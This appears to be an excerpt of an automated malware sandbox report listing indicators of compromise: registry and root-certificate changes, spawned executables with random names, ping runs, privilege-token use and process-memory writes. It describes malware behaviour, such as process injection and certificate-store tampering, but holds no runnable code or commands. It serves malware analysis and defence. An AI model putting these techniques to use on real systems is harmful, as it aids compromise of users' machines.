\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\MRUListEx = 00000000ffffffff Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7 Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0 Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202 Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202 Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\MRUListEx = ffffffff Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0 = 56003100000000008e543d9212004170704461746100400009000400efbe8e543d92e55473672e0000008ce10100000001000000000000000000000000000000c97e6b004100700070004400610074006100000016000000 Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\MRUListEx = 00000000ffffffff Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202 Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8 Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\SniffedFolderType = "Generic" Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0 Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\SniffedFolderType = "Generic" Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202 Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\MRUListEx = ffffffff Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0 = 9200310000000000e554446810003732424637337e3100007a0009000400efbee5544468e55447682e0000009c310200000008000000000000000000000000000000f18b3d00370032006200660037003300300033002d0035006400630030002d0034003400650039002d0038003700640038002d00360039003800660038003600370037006100630061006200000018000000 Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0 Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0\MRUListEx = ffffffff Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0 = 5000310000000000e554446810004c6f63616c003c0009000400efbe8e543d92e55444682e0000009fe10100000001000000000000000000000000000000f18b3d004c006f00630061006c00000014000000 Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\SniffedFolderType = "Generic" Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0\NodeSlot = "8" Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0 Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 -
Processes:
kdnmdIr2m3Z75rmoxMQY45zR.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 kdnmdIr2m3Z75rmoxMQY45zR.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e kdnmdIr2m3Z75rmoxMQY45zR.exe -
Runs ping.exe 1 TTPs 5 IoCs
Processes:
PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEpid process 6000 PING.EXE 109156 PING.EXE 109316 PING.EXE 109376 PING.EXE 109464 PING.EXE -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 256 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
SmartClock.exepid process 65352 SmartClock.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exevl16pz8ikehSoCEiO6vpU86F.exeTUsKZ9i3PovwwAgsSaLpghkJ.exeuw5KPJ6a18gzLPne_F5e0c1_.exepowershell.exepid process 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe 4040 vl16pz8ikehSoCEiO6vpU86F.exe 4040 vl16pz8ikehSoCEiO6vpU86F.exe 4040 vl16pz8ikehSoCEiO6vpU86F.exe 4040 vl16pz8ikehSoCEiO6vpU86F.exe 5060 TUsKZ9i3PovwwAgsSaLpghkJ.exe 5060 TUsKZ9i3PovwwAgsSaLpghkJ.exe 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 968 uw5KPJ6a18gzLPne_F5e0c1_.exe 968 uw5KPJ6a18gzLPne_F5e0c1_.exe 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2908 powershell.exe 2908 powershell.exe 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 2032 -
Suspicious behavior: MapViewOfSection 30 IoCs
Processes:
TUsKZ9i3PovwwAgsSaLpghkJ.exeItvrzxmax2.exe6DF1.exe8AF1.exepid process 5060 TUsKZ9i3PovwwAgsSaLpghkJ.exe 1424 Itvrzxmax2.exe 2032 2032 2032 2032 3204 6DF1.exe 2032 2032 2032 2032 3624 8AF1.exe 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
SETUP_~2.EXEwd1PHHYFXTO2GwSbYNeKiEhd.exe4AqwIgOuAzGydA7_h8I9ZZtr.exeuw5KPJ6a18gzLPne_F5e0c1_.exevl16pz8ikehSoCEiO6vpU86F.exepowershell.exeRunDll32.exedescription pid process Token: SeDebugPrivilege 4960 SETUP_~2.EXE Token: SeDebugPrivilege 1744 wd1PHHYFXTO2GwSbYNeKiEhd.exe Token: SeDebugPrivilege 2948 4AqwIgOuAzGydA7_h8I9ZZtr.exe Token: SeShutdownPrivilege 2032 Token: SeCreatePagefilePrivilege 2032 Token: SeShutdownPrivilege 2032 Token: SeCreatePagefilePrivilege 2032 Token: SeShutdownPrivilege 2032 Token: SeCreatePagefilePrivilege 2032 Token: SeDebugPrivilege 968 uw5KPJ6a18gzLPne_F5e0c1_.exe Token: SeDebugPrivilege 4040 vl16pz8ikehSoCEiO6vpU86F.exe Token: SeDebugPrivilege 2908 powershell.exe Token: SeShutdownPrivilege 2032 Token: SeCreatePagefilePrivilege 2032 Token: SeShutdownPrivilege 2032 Token: SeCreatePagefilePrivilege 2032 Token: SeShutdownPrivilege 2032 Token: SeCreatePagefilePrivilege 2032 Token: SeShutdownPrivilege 2032 Token: SeCreatePagefilePrivilege 2032 Token: SeShutdownPrivilege 2032 Token: SeCreatePagefilePrivilege 2032 Token: SeShutdownPrivilege 2032 Token: SeCreatePagefilePrivilege 2032 Token: SeShutdownPrivilege 2032 Token: SeCreatePagefilePrivilege 2032 Token: SeShutdownPrivilege 2032 Token: SeCreatePagefilePrivilege 2032 Token: SeShutdownPrivilege 2032 Token: SeCreatePagefilePrivilege 2032 Token: SeShutdownPrivilege 2032 Token: SeCreatePagefilePrivilege 2032 Token: SeShutdownPrivilege 2032 Token: SeCreatePagefilePrivilege 2032 Token: SeShutdownPrivilege 2032 Token: SeCreatePagefilePrivilege 2032 Token: SeShutdownPrivilege 2032 Token: SeCreatePagefilePrivilege 2032 Token: SeShutdownPrivilege 2032 Token: SeCreatePagefilePrivilege 2032 Token: SeShutdownPrivilege 2032 Token: SeCreatePagefilePrivilege 2032 Token: SeShutdownPrivilege 2032 Token: SeCreatePagefilePrivilege 2032 Token: SeShutdownPrivilege 2032 Token: SeCreatePagefilePrivilege 2032 Token: SeShutdownPrivilege 2032 Token: SeCreatePagefilePrivilege 2032 Token: SeShutdownPrivilege 2032 Token: SeCreatePagefilePrivilege 2032 Token: SeShutdownPrivilege 2032 Token: SeCreatePagefilePrivilege 2032 Token: SeShutdownPrivilege 2032 Token: SeCreatePagefilePrivilege 2032 Token: SeShutdownPrivilege 2032 Token: SeCreatePagefilePrivilege 2032 Token: SeShutdownPrivilege 2032 Token: SeCreatePagefilePrivilege 2032 Token: SeShutdownPrivilege 2032 Token: SeCreatePagefilePrivilege 2032 Token: SeShutdownPrivilege 2032 Token: SeCreatePagefilePrivilege 2032 Token: SeDebugPrivilege 4688 RunDll32.exe Token: SeShutdownPrivilege 2032 -
Suspicious use of FindShellTrayWindow 35 IoCs
Processes:
Tal.exe.pifTal.exe.pifpid process 2032 2032 2032 2032 2032 109144 Tal.exe.pif 2032 2032 109144 Tal.exe.pif 109144 Tal.exe.pif 2032 2032 109296 Tal.exe.pif 2032 2032 109296 Tal.exe.pif 109296 Tal.exe.pif 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
Tal.exe.pifTal.exe.pifpid process 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 109144 Tal.exe.pif 109144 Tal.exe.pif 109144 Tal.exe.pif 109296 Tal.exe.pif 109296 Tal.exe.pif 109296 Tal.exe.pif 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 2032 -
Suspicious use of SetWindowsHookEx 15 IoCs
Processes:
3A2F1MAI23B9J52.exeBvEl9bplplH_zds3oc3G9TH2.exeBvEl9bplplH_zds3oc3G9TH2.exe0B7121CH132B0JI.exeIHH9FGG6KIID6CG.exepid process 2032 2032 2032 2032 5640 3A2F1MAI23B9J52.exe 5640 3A2F1MAI23B9J52.exe 5396 BvEl9bplplH_zds3oc3G9TH2.exe 5396 BvEl9bplplH_zds3oc3G9TH2.exe 5996 BvEl9bplplH_zds3oc3G9TH2.exe 5996 BvEl9bplplH_zds3oc3G9TH2.exe 4320 0B7121CH132B0JI.exe 4320 0B7121CH132B0JI.exe 2596 IHH9FGG6KIID6CG.exe 2596 IHH9FGG6KIID6CG.exe 2032 -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
pid process 2032 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exefaae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exejtfXiAYn71DsfeALHUTabEl4.exeFnPK_uULTBfwZezEEGCXaVE6.exedescription pid process target process PID 3620 wrote to memory of 4196 3620 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe PID 3620 wrote to memory of 4196 3620 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe PID 3620 wrote to memory of 4196 3620 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe PID 3620 wrote to memory of 4196 3620 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe PID 3620 wrote to memory of 4196 3620 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe PID 3620 wrote to memory of 4196 3620 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe PID 3620 wrote to memory of 4196 3620 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe PID 3620 wrote to memory of 4196 3620 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe PID 3620 wrote to memory of 4196 3620 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe PID 3620 wrote to memory of 4196 3620 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe PID 4196 wrote to memory of 3704 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe sd1gX57A0wItT05S8cNnJS6P.exe PID 4196 wrote to memory of 3704 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe sd1gX57A0wItT05S8cNnJS6P.exe PID 4196 wrote to memory of 3704 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe sd1gX57A0wItT05S8cNnJS6P.exe PID 4196 wrote to memory of 4436 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe 1hObAWF58hoo9_jA8jPWtwDx.exe PID 4196 wrote to memory of 4436 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe 1hObAWF58hoo9_jA8jPWtwDx.exe PID 4196 wrote to memory of 4436 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe 1hObAWF58hoo9_jA8jPWtwDx.exe PID 4196 wrote to memory of 4052 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe EYGVHMYze8w9bXCxKAs0sRH8.exe PID 4196 wrote to memory of 4052 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe EYGVHMYze8w9bXCxKAs0sRH8.exe PID 4196 wrote to memory of 4052 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe EYGVHMYze8w9bXCxKAs0sRH8.exe PID 4196 wrote to memory of 2948 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe 4AqwIgOuAzGydA7_h8I9ZZtr.exe PID 4196 wrote to memory of 2948 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe 4AqwIgOuAzGydA7_h8I9ZZtr.exe PID 4196 wrote to memory of 2948 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe 4AqwIgOuAzGydA7_h8I9ZZtr.exe PID 4196 wrote to memory of 1744 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe wd1PHHYFXTO2GwSbYNeKiEhd.exe PID 4196 wrote to memory of 1744 4196 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe wd1PHHYFXTO2GwSbYNeKiEhd.exe PID 4196 wrote to memory of 1744 4196 